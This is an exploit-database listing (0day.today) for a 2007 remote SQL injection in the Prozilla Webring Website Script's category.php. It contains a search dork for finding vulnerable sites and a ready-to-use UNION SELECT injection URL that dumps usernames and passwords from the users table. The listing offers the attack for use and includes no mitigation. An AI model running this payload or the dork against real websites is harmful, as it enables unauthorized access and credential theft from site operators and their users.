[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Prozilla Webring Website Script (category.php cat) Remote SQL Injection

Author
t0pP8uZz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2074
Category
web applications
Date add
12-08-2007
Platform
unsorted
=======================================================================
Prozilla Webring Website Script (category.php cat) Remote SQL Injection
=======================================================================


--==+================================================================================+==--
--==         Prozilla Webring Website Script SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://prozilla.com
DORK: altavista dork (include quotes) : "Create your own free webring and bring traffic to your website. Join now, it's free!"


DESCRIPTION: 
pull user details from the database, returns multiple data :D


EXPLOITS:
http://server.com/Script_Dir/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(username,0x3a,password),3,4,5/**/FROM/**/users/*




--==+================================================================================+==--
--==         Prozilla Webring Website Script SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--




#  0day.today [2024-12-24]  #